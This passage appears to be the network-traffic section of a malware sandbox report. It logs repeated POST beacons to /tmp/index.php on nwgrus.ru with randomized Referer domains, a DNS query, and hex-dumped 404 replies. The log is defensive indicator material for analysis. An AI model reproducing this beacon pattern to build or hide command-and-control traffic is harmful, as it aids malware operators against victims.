Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aovitjibeagnbys.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://snussmiqvhuxlm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lldjdgortos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://syoedasuherii.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://njefqjlwqiadunh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tdojljspnss.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eodrfdbgkbdgmox.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cguufeaxdioixvo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hbtkpieyfdv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nannolqtxvdvgf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pjnfdjwducxdwna.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bvawnwiwcpmgflx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yocwufliskskpcvu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bfjqfyqpqtyfp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xknbcflanypqj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fgbayjdhmimo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ecwlvrprlkc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pfvfrxtosmhgis.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qrcepyiavbj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jbughtdilxsi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://adulmxafuqyrwioa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ibqsdsbooxlotmkk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://firvhcleclspvqf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wastiylaaiv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gmunjwtmmqbkfjxj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ekdlxdwusihebwve.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ytxsvmhxdoiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cjgfbmyhhfmho.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ewwaevdbcqu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://paccyqypahp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vobnbocmacccbp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://crbgbhwlxoevenop.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ghpsevkbljqmyuby.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: nwgrus.ru

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: nwgrus.ru

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dylagwrgixlfmu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: nwgrus.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 